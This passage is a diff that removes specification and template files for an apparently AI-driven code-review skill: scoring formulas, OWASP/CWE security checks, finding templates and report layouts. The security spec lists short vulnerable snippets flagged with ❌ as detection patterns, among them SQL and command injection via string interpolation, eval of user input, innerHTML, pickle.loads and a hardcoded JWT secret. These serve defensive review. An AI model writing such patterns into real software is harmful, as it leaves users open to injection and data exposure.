||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
|
||||
Security = 100 - (Critical × 30 + High × 2 + Medium × 0.5)
|
||||
Code Quality = 100 - (violations / total_checks × 100)
|
||||
Performance = 100 - (issues / potential_issues × 100)
|
||||
Maintainability = (doc_coverage × 0.4 + test_coverage × 0.4 + dependency_health × 0.2)
|
||||
```
|
||||
|
||||
### Risk Levels
|
||||
|
||||
- **LOW**: Score 90-100
|
||||
- **MEDIUM**: Score 70-89
|
||||
- **HIGH**: Score 50-69
|
||||
- **CRITICAL**: Score < 50
|
||||
@@ -1,252 +0,0 @@
|
||||
# Quality Standards
|
||||
|
||||
## Overall Quality Metrics
|
||||
|
||||
### Quality Score Formula
|
||||
|
||||
```
|
||||
Overall Quality = (
|
||||
Correctness × 0.30 +
|
||||
Security × 0.25 +
|
||||
Maintainability × 0.20 +
|
||||
Performance × 0.15 +
|
||||
Documentation × 0.10
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
|
||||
| Range | Grade | Description |
|
||||
|-------|-------|-------------|
|
||||
| 90-100 | A | Excellent - Production ready |
|
||||
| 80-89 | B | Good - Minor improvements needed |
|
||||
| 70-79 | C | Acceptable - Some issues to address |
|
||||
| 60-69 | D | Poor - Significant improvements required |
|
||||
| 0-59 | F | Failing - Major issues, not production ready |
|
||||
|
||||
## Review Completeness
|
||||
|
||||
### Mandatory Checks
|
||||
|
||||
**Security**:
|
||||
- ✅ OWASP Top 10 coverage
|
||||
- ✅ CWE Top 25 coverage
|
||||
- ✅ Language-specific security patterns
|
||||
- ✅ Dependency vulnerability scan
|
||||
|
||||
**Code Quality**:
|
||||
- ✅ Naming convention compliance
|
||||
- ✅ Complexity analysis
|
||||
- ✅ Code duplication detection
|
||||
- ✅ Dead code identification
|
||||
|
||||
**Performance**:
|
||||
- ✅ N+1 query detection
|
||||
- ✅ Algorithm efficiency check
|
||||
- ✅ Memory leak detection
|
||||
- ✅ Resource cleanup verification
|
||||
|
||||
**Maintainability**:
|
||||
- ✅ Documentation coverage
|
||||
- ✅ Test coverage analysis
|
||||
- ✅ Dependency health check
|
||||
- ✅ Error handling review
|
||||
|
||||
## Reporting Standards
|
||||
|
||||
### Finding Requirements
|
||||
|
||||
Each finding must include:
|
||||
- **Unique ID**: SEC-001, BP-001, etc.
|
||||
- **Type**: Specific issue type (sql-injection, high-complexity, etc.)
|
||||
- **Severity**: Critical, High, Medium, Low
|
||||
- **Location**: File path and line number
|
||||
- **Code Snippet**: Vulnerable/problematic code
|
||||
- **Message**: Clear description of the issue
|
||||
- **Recommendation**: Specific fix guidance
|
||||
- **Example**: Before/after code example
|
||||
|
||||
### Report Structure
|
||||
|
||||
**Executive Summary**:
|
||||
- High-level overview
|
||||
- Risk assessment
|
||||
- Key statistics
|
||||
- Compliance status
|
||||
|
||||
**Detailed Findings**:
|
||||
- Organized by severity
|
||||
- Grouped by category
|
||||
- Full details for each finding
|
||||
|
||||
**Action Plan**:
|
||||
- Prioritized fix list
|
||||
- Effort estimates
|
||||
- Timeline recommendations
|
||||
|
||||
**Metrics Dashboard**:
|
||||
- Quality scores
|
||||
- Trend analysis (if historical data)
|
||||
- Compliance status
|
||||
|
||||
**Appendix**:
|
||||
- Full findings list
|
||||
- Configuration details
|
||||
- Tool versions
|
||||
- References
|
||||
|
||||
## Output File Standards
|
||||
|
||||
### File Naming
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory
|
||||
├── security-findings.json # Security findings
|
||||
├── best-practices-findings.json # Best practices findings
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Main report
|
||||
├── FIX-CHECKLIST.md # Action checklist
|
||||
└── state.json # Session state
|
||||
```
|
||||
|
||||
### JSON Schema
|
||||
|
||||
**Finding Schema**:
|
||||
```json
|
||||
{
|
||||
"id": "string",
|
||||
"type": "string",
|
||||
"category": "security|code_quality|performance|maintainability",
|
||||
"severity": "critical|high|medium|low",
|
||||
"file": "string",
|
||||
"line": "number",
|
||||
"column": "number",
|
||||
"code": "string",
|
||||
"message": "string",
|
||||
"recommendation": {
|
||||
"description": "string",
|
||||
"fix_example": "string"
|
||||
},
|
||||
"references": ["string"],
|
||||
"cwe": "string (optional)",
|
||||
"owasp": "string (optional)"
|
||||
}
|
||||
```
|
||||
|
||||
## Validation Requirements
|
||||
|
||||
### Phase Completion Criteria
|
||||
|
||||
**Phase 1 (Code Discovery)**:
|
||||
- ✅ At least 1 file discovered
|
||||
- ✅ Files categorized by priority
|
||||
- ✅ Metadata extracted
|
||||
- ✅ Inventory JSON created
|
||||
|
||||
**Phase 2 (Security Analysis)**:
|
||||
- ✅ All critical/high priority files analyzed
|
||||
- ✅ Findings have severity classification
|
||||
- ✅ CWE/OWASP mappings included
|
||||
- ✅ Fix recommendations provided
|
||||
|
||||
**Phase 3 (Best Practices)**:
|
||||
- ✅ Code quality checks completed
|
||||
- ✅ Performance analysis done
|
||||
- ✅ Maintainability assessed
|
||||
- ✅ Recommendations provided
|
||||
|
||||
**Phase 4 (Report Generation)**:
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Reports generated
|
||||
- ✅ Checklist created
|
||||
|
||||
## Skill Execution Standards
|
||||
|
||||
### Performance Targets
|
||||
|
||||
- **Phase 1**: < 30 seconds per 1000 files
|
||||
- **Phase 2**: < 60 seconds per 100 files (security)
|
||||
- **Phase 3**: < 60 seconds per 100 files (best practices)
|
||||
- **Phase 4**: < 10 seconds (report generation)
|
||||
|
||||
### Resource Limits
|
||||
|
||||
- **Memory**: < 2GB for projects with 1000+ files
|
||||
- **CPU**: Efficient pattern matching (minimize regex complexity)
|
||||
- **Disk**: Use streaming for large files (> 10MB)
|
||||
|
||||
### Error Handling
|
||||
|
||||
**Graceful Degradation**:
|
||||
- If tool unavailable: Skip check, note in report
|
||||
- If file unreadable: Log warning, continue with others
|
||||
- If analysis fails: Report error, continue with next file
|
||||
|
||||
**User Notification**:
|
||||
- Progress updates every 10% completion
|
||||
- Clear error messages with troubleshooting steps
|
||||
- Final summary with metrics and file locations
|
||||
|
||||
## Integration Standards
|
||||
|
||||
### Git Integration
|
||||
|
||||
**Pre-commit Hook**:
|
||||
```bash
|
||||
#!/bin/bash
|
||||
ccw run code-reviewer --scope staged --severity critical,high
|
||||
exit $? # Block commit if critical/high issues found
|
||||
```
|
||||
|
||||
**PR Comments**:
|
||||
- Automatic review comments on changed lines
|
||||
- Summary comment with overall findings
|
||||
- Status check (pass/fail based on threshold)
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
**Requirements**:
|
||||
- Exit code 0 if no critical/high issues
|
||||
- Exit code 1 if blocking issues found
|
||||
- JSON output for parsing
|
||||
- Configurable severity threshold
|
||||
|
||||
### IDE Integration
|
||||
|
||||
**LSP Support** (future):
|
||||
- Real-time security/quality feedback
|
||||
- Inline fix suggestions
|
||||
- Quick actions for common fixes
|
||||
|
||||
## Compliance Mapping
|
||||
|
||||
### Supported Standards
|
||||
|
||||
**PCI DSS**:
|
||||
- Requirement 6.5: Common coding vulnerabilities
|
||||
- Map findings to specific requirements
|
||||
|
||||
**HIPAA**:
|
||||
- Technical safeguards
|
||||
- Map data exposure findings
|
||||
|
||||
**GDPR**:
|
||||
- Data protection by design
|
||||
- Map sensitive data handling
|
||||
|
||||
**SOC 2**:
|
||||
- Security controls
|
||||
- Map access control findings
|
||||
|
||||
### Compliance Reports
|
||||
|
||||
Generate compliance-specific reports:
|
||||
```
|
||||
.code-review/compliance/
|
||||
├── pci-dss-report.md
|
||||
├── hipaa-report.md
|
||||
├── gdpr-report.md
|
||||
└── soc2-report.md
|
||||
```
|
||||
@@ -1,243 +0,0 @@
|
||||
# Security Requirements Specification
|
||||
|
||||
## OWASP Top 10 Coverage
|
||||
|
||||
### A01:2021 - Broken Access Control
|
||||
|
||||
**Checks**:
|
||||
- Missing authorization checks on protected routes
|
||||
- Insecure direct object references (IDOR)
|
||||
- Path traversal vulnerabilities
|
||||
- Missing CSRF protection
|
||||
- Elevation of privilege
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Missing auth middleware
|
||||
router.get('/admin/*', handler); // ❌ No auth check
|
||||
|
||||
// Insecure direct object reference
|
||||
router.get('/user/:id', async (req, res) => {
|
||||
const user = await User.findById(req.params.id); // ❌ No ownership check
|
||||
res.json(user);
|
||||
});
|
||||
```
|
||||
|
||||
### A02:2021 - Cryptographic Failures
|
||||
|
||||
**Checks**:
|
||||
- Sensitive data transmitted without encryption
|
||||
- Weak cryptographic algorithms (MD5, SHA1)
|
||||
- Hardcoded secrets/keys
|
||||
- Insecure random number generation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak hashing
|
||||
const hash = crypto.createHash('md5').update(password); // ❌ MD5 is weak
|
||||
|
||||
// Hardcoded secret
|
||||
const token = jwt.sign(payload, 'secret123'); // ❌ Hardcoded secret
|
||||
```
|
||||
|
||||
### A03:2021 - Injection
|
||||
|
||||
**Checks**:
|
||||
- SQL injection
|
||||
- NoSQL injection
|
||||
- Command injection
|
||||
- LDAP injection
|
||||
- XPath injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SQL injection
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`; // ❌
|
||||
|
||||
// Command injection
|
||||
exec(`git clone ${userRepo}`); // ❌
|
||||
```
|
||||
|
||||
### A04:2021 - Insecure Design
|
||||
|
||||
**Checks**:
|
||||
- Missing rate limiting
|
||||
- Lack of input validation
|
||||
- Business logic flaws
|
||||
- Missing security requirements
|
||||
|
||||
### A05:2021 - Security Misconfiguration
|
||||
|
||||
**Checks**:
|
||||
- Default credentials
|
||||
- Overly permissive CORS
|
||||
- Verbose error messages
|
||||
- Unnecessary features enabled
|
||||
- Missing security headers
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Overly permissive CORS
|
||||
app.use(cors({ origin: '*' })); // ❌
|
||||
|
||||
// Verbose error
|
||||
res.status(500).json({ error: err.stack }); // ❌
|
||||
```
|
||||
|
||||
### A06:2021 - Vulnerable and Outdated Components
|
||||
|
||||
**Checks**:
|
||||
- Dependencies with known vulnerabilities
|
||||
- Unmaintained dependencies
|
||||
- Using deprecated APIs
|
||||
|
||||
### A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Checks**:
|
||||
- Weak password requirements
|
||||
- Permits brute force attacks
|
||||
- Exposed session IDs
|
||||
- Weak JWT implementation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak bcrypt rounds
|
||||
bcrypt.hash(password, 4); // ❌ Too low (min: 10)
|
||||
|
||||
// Session ID in URL
|
||||
res.redirect(`/dashboard?sessionId=${sessionId}`); // ❌
|
||||
```
|
||||
|
||||
### A08:2021 - Software and Data Integrity Failures
|
||||
|
||||
**Checks**:
|
||||
- Insecure deserialization
|
||||
- Unsigned/unverified updates
|
||||
- CI/CD pipeline vulnerabilities
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Insecure deserialization
|
||||
const obj = eval(userInput); // ❌
|
||||
|
||||
// Pickle vulnerability (Python)
|
||||
data = pickle.loads(untrusted_data) # ❌
|
||||
```
|
||||
|
||||
### A09:2021 - Security Logging and Monitoring Failures
|
||||
|
||||
**Checks**:
|
||||
- Missing audit logs
|
||||
- Sensitive data in logs
|
||||
- Insufficient monitoring
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Password in logs
|
||||
console.log(`Login attempt: ${username}:${password}`); // ❌
|
||||
```
|
||||
|
||||
### A10:2021 - Server-Side Request Forgery (SSRF)
|
||||
|
||||
**Checks**:
|
||||
- Unvalidated URLs in requests
|
||||
- Internal network access
|
||||
- Cloud metadata exposure
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SSRF vulnerability
|
||||
const response = await fetch(userProvidedUrl); // ❌
|
||||
```
|
||||
|
||||
## CWE Top 25 Coverage
|
||||
|
||||
### CWE-79: Cross-site Scripting (XSS)
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
element.innerHTML = userInput; // ❌
|
||||
document.write(userInput); // ❌
|
||||
```
|
||||
|
||||
### CWE-89: SQL Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
query = `SELECT * FROM users WHERE name = '${name}'`; // ❌
|
||||
```
|
||||
|
||||
### CWE-20: Improper Input Validation
|
||||
|
||||
**Checks**:
|
||||
- Missing input sanitization
|
||||
- No input length limits
|
||||
- Unvalidated file uploads
|
||||
|
||||
### CWE-78: OS Command Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
exec(`ping ${userInput}`); // ❌
|
||||
```
|
||||
|
||||
### CWE-190: Integer Overflow
|
||||
|
||||
**Checks**:
|
||||
- Large number operations without bounds checking
|
||||
- Array allocation with user-controlled size
|
||||
|
||||
## Language-Specific Security Rules
|
||||
|
||||
### TypeScript/JavaScript
|
||||
|
||||
- Prototype pollution
|
||||
- eval() usage
|
||||
- Unsafe regex (ReDoS)
|
||||
- require() with dynamic input
|
||||
|
||||
### Python
|
||||
|
||||
- pickle vulnerabilities
|
||||
- yaml.unsafe_load()
|
||||
- SQL injection in SQLAlchemy
|
||||
- Command injection in subprocess
|
||||
|
||||
### Java
|
||||
|
||||
- Deserialization vulnerabilities
|
||||
- XXE in XML parsers
|
||||
- Path traversal
|
||||
- SQL injection in JDBC
|
||||
|
||||
### Go
|
||||
|
||||
- Race conditions
|
||||
- SQL injection
|
||||
- Path traversal
|
||||
- Weak cryptography
|
||||
|
||||
## Severity Classification
|
||||
|
||||
### Critical
|
||||
- Remote code execution
|
||||
- SQL injection with write access
|
||||
- Authentication bypass
|
||||
- Hardcoded credentials in production
|
||||
|
||||
### High
|
||||
- XSS in sensitive contexts
|
||||
- Missing authorization checks
|
||||
- Sensitive data exposure
|
||||
- Insecure cryptography
|
||||
|
||||
### Medium
|
||||
- Missing rate limiting
|
||||
- Weak password policy
|
||||
- Security misconfiguration
|
||||
- Information disclosure
|
||||
|
||||
### Low
|
||||
- Missing security headers
|
||||
- Verbose error messages
|
||||
- Outdated dependencies (no known exploits)
|
||||
@@ -1,234 +0,0 @@
|
||||
# Best Practice Finding Template
|
||||
|
||||
Use this template for documenting code quality, performance, and maintainability issues.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "BP-{number}",
|
||||
"type": "{issue-type}",
|
||||
"category": "{code_quality|performance|maintainability}",
|
||||
"severity": "{high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"function": "{function-name}",
|
||||
"message": "{clear-description}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"example": "{corrected-code}"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-{number}] {Issue Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**Category**: {Code Quality|Performance|Maintainability}
|
||||
|
||||
**Issue**: {Detailed explanation of the problem}
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`{language}
|
||||
{problematic-code}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{improved-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: {Why this matters - readability, performance, maintainability}
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: High Complexity
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-001] High Cyclomatic Complexity
|
||||
|
||||
**File**: `src/utils/validator.ts:78`
|
||||
**Category**: Code Quality
|
||||
**Function**: `validateUserInput`
|
||||
**Complexity**: 15 (threshold: 10)
|
||||
|
||||
**Issue**: Function has 15 decision points, making it difficult to test and maintain.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
function validateUserInput(input) {
|
||||
if (!input) return false;
|
||||
if (!input.email) return false;
|
||||
if (!input.email.includes('@')) return false;
|
||||
if (input.email.length > 255) return false;
|
||||
// ... 11 more conditions
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Extract validation rules
|
||||
const validationRules = {
|
||||
email: (email) => email && email.includes('@') && email.length <= 255,
|
||||
password: (pwd) => pwd && pwd.length >= 8 && /[A-Z]/.test(pwd),
|
||||
username: (name) => name && /^[a-zA-Z0-9_]+$/.test(name),
|
||||
};
|
||||
|
||||
// Simplified validator
|
||||
function validateUserInput(input) {
|
||||
return Object.entries(validationRules).every(([field, validate]) =>
|
||||
validate(input[field])
|
||||
);
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces complexity from 15 to 3, improves testability, and makes validation rules reusable.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: N+1 Query
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-002] N+1 Query Pattern
|
||||
|
||||
**File**: `src/api/orders.ts:45`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: Database query executed inside loop, causing N+1 queries problem. For 100 orders, this creates 101 database queries instead of 2.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
const orders = await Order.findAll();
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
order.userName = user.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Batch query all users at once
|
||||
const orders = await Order.findAll();
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
|
||||
// Create lookup map for O(1) access
|
||||
const userMap = new Map(users.map(u => [u.id, u]));
|
||||
|
||||
// Enrich orders with user data
|
||||
for (const order of orders) {
|
||||
order.userName = userMap.get(order.userId)?.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces database queries from O(n) to O(1), significantly improving performance for large datasets.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Missing Documentation
|
||||
|
||||
```markdown
|
||||
### 🟡 [BP-003] Missing Documentation
|
||||
|
||||
**File**: `src/services/PaymentService.ts:23`
|
||||
**Category**: Maintainability
|
||||
|
||||
**Issue**: Exported class lacks documentation, making it difficult for other developers to understand its purpose and usage.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
export class PaymentService {
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
/**
|
||||
* Service for processing payment transactions
|
||||
*
|
||||
* Handles payment processing, refunds, and transaction logging.
|
||||
* Integrates with Stripe payment gateway.
|
||||
*
|
||||
* @example
|
||||
* const paymentService = new PaymentService();
|
||||
* const result = await paymentService.processPayment('order-123', 99.99);
|
||||
*/
|
||||
export class PaymentService {
|
||||
/**
|
||||
* Process a payment for an order
|
||||
*
|
||||
* @param orderId - Unique order identifier
|
||||
* @param amount - Payment amount in USD
|
||||
* @returns Payment confirmation with transaction ID
|
||||
* @throws {PaymentError} If payment processing fails
|
||||
*/
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Improves code discoverability and reduces onboarding time for new developers.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Memory Leak
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-004] Potential Memory Leak
|
||||
|
||||
**File**: `src/components/Chat.tsx:56`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: WebSocket event listener added without cleanup, causing memory leaks when component unmounts.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
|
||||
// Cleanup on unmount
|
||||
return () => {
|
||||
socket.off('message', handleMessage);
|
||||
};
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Prevents memory leaks and improves application stability in long-running sessions.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Guidelines
|
||||
|
||||
### High
|
||||
- Major performance impact (N+1 queries, O(n²) algorithms)
|
||||
- Critical maintainability issues (complexity > 15)
|
||||
- Missing error handling in critical paths
|
||||
|
||||
### Medium
|
||||
- Moderate performance impact
|
||||
- Code quality issues (complexity 11-15, duplication)
|
||||
- Missing tests for important features
|
||||
|
||||
### Low
|
||||
- Minor style violations
|
||||
- Missing documentation
|
||||
- Low-impact dead code
|
||||
@@ -1,316 +0,0 @@
|
||||
# Report Template
|
||||
|
||||
## Main Report Structure (REPORT.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
---
|
||||
|
||||
## 📊 Executive Summary
|
||||
|
||||
### Overall Assessment
|
||||
|
||||
{Brief 2-3 paragraph assessment of code health}
|
||||
|
||||
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
|
||||
|
||||
{Risk assessment based on findings severity and count}
|
||||
|
||||
### Key Statistics
|
||||
|
||||
| Metric | Value | Status |
|
||||
|--------|-------|--------|
|
||||
| Total Files | {count} | - |
|
||||
| Files with Issues | {count} | {percentage}% |
|
||||
| Critical Findings | {count} | {icon} |
|
||||
| High Findings | {count} | {icon} |
|
||||
| Medium Findings | {count} | {icon} |
|
||||
| Low Findings | {count} | {icon} |
|
||||
|
||||
### Category Breakdown
|
||||
|
||||
| Category | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Security | {count} | {percentage}% |
|
||||
| Code Quality | {count} | {percentage}% |
|
||||
| Performance | {count} | {percentage}% |
|
||||
| Maintainability | {count} | {percentage}% |
|
||||
|
||||
---
|
||||
|
||||
## 🎯 Quality Scores
|
||||
|
||||
### Security Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Code Quality Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Performance Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Maintainability Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Overall Score: {score}/100
|
||||
|
||||
**Grade**: {A|B|C|D|F}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Findings (Requires Immediate Action)
|
||||
|
||||
{List all critical findings using security-finding.md template}
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Findings
|
||||
|
||||
{List all high findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Findings
|
||||
|
||||
{List all medium findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Findings
|
||||
|
||||
{List all low findings}
|
||||
|
||||
---
|
||||
|
||||
## 📋 Action Plan
|
||||
|
||||
### Immediate (Within 24 hours)
|
||||
1. {Critical issue 1}
|
||||
2. {Critical issue 2}
|
||||
3. {Critical issue 3}
|
||||
|
||||
### Short-term (Within 1 week)
|
||||
1. {High priority issue 1}
|
||||
2. {High priority issue 2}
|
||||
...
|
||||
|
||||
### Medium-term (Within 1 month)
|
||||
1. {Medium priority issue 1}
|
||||
2. {Medium priority issue 2}
|
||||
...
|
||||
|
||||
### Long-term (Within 3 months)
|
||||
1. {Low priority issue 1}
|
||||
2. {Improvement initiative 1}
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## 📊 Metrics Dashboard
|
||||
|
||||
### Code Health Trends
|
||||
|
||||
{If historical data available, show trends}
|
||||
|
||||
### File Hotspots
|
||||
|
||||
Top files with most issues:
|
||||
1. `{file-path}` - {count} issues ({severity breakdown})
|
||||
2. `{file-path}` - {count} issues
|
||||
...
|
||||
|
||||
### Technology Breakdown
|
||||
|
||||
Issues by language/framework:
|
||||
- TypeScript: {count} issues
|
||||
- Python: {count} issues
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## ✅ Compliance Status
|
||||
|
||||
### PCI DSS
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### HIPAA
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### GDPR
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
---
|
||||
|
||||
## 📚 Appendix
|
||||
|
||||
### A. Review Configuration
|
||||
|
||||
\`\`\`json
|
||||
{review-config}
|
||||
\`\`\`
|
||||
|
||||
### B. Tools and Versions
|
||||
|
||||
- Code Reviewer Skill: v1.0.0
|
||||
- Security Rules: OWASP Top 10 2021, CWE Top 25
|
||||
- Languages Analyzed: {list}
|
||||
|
||||
### C. References
|
||||
|
||||
- [OWASP Top 10 2021](https://owasp.org/Top10/)
|
||||
- [CWE Top 25](https://cwe.mitre.org/top25/)
|
||||
- {additional references}
|
||||
|
||||
### D. Full Findings Index
|
||||
|
||||
{Links to detailed finding JSONs}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Fix Checklist Template (FIX-CHECKLIST.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Total Items**: {count}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
|
||||
- Effort: 1 hour
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
|
||||
- Effort: 30 minutes
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
|
||||
- Effort: 2 hours
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
|
||||
- Effort: 1 hour
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Issues (Fix This Month)
|
||||
|
||||
{List medium priority items}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Issues (Fix Next Release)
|
||||
|
||||
{List low priority items}
|
||||
|
||||
---
|
||||
|
||||
## Progress Tracking
|
||||
|
||||
**Overall Progress**: {completed}/{total} ({percentage}%)
|
||||
|
||||
- Critical: {completed}/{total}
|
||||
- High: {completed}/{total}
|
||||
- Medium: {completed}/{total}
|
||||
- Low: {completed}/{total}
|
||||
|
||||
**Estimated Total Effort**: {hours} hours
|
||||
**Estimated Completion**: {date}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Summary JSON Template (summary.json)
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"files_with_issues": 89,
|
||||
"total_findings": 69,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 13,
|
||||
"medium": 30,
|
||||
"low": 23
|
||||
},
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"grade": "C",
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true,
|
||||
"compliance": {
|
||||
"pci_dss": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
|
||||
},
|
||||
"hipaa": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-005", "SEC-009"]
|
||||
},
|
||||
"gdpr": {
|
||||
"status": "PARTIAL",
|
||||
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
|
||||
}
|
||||
},
|
||||
"top_issues": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145
|
||||
}
|
||||
],
|
||||
"hotspots": [
|
||||
{
|
||||
"file": "src/auth/user-service.ts",
|
||||
"issues": 5,
|
||||
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
|
||||
}
|
||||
],
|
||||
"effort_estimate": {
|
||||
"critical": 4.5,
|
||||
"high": 18,
|
||||
"medium": 35,
|
||||
"low": 12,
|
||||
"total_hours": 69.5
|
||||
}
|
||||
}
|
||||
```
|
||||
@@ -1,161 +0,0 @@
|
||||
# Security Finding Template
|
||||
|
||||
Use this template for documenting security vulnerabilities.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "SEC-{number}",
|
||||
"type": "{vulnerability-type}",
|
||||
"severity": "{critical|high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"column": {column-number},
|
||||
"code": "{vulnerable-code-snippet}",
|
||||
"message": "{clear-description-of-issue}",
|
||||
"cwe": "CWE-{number}",
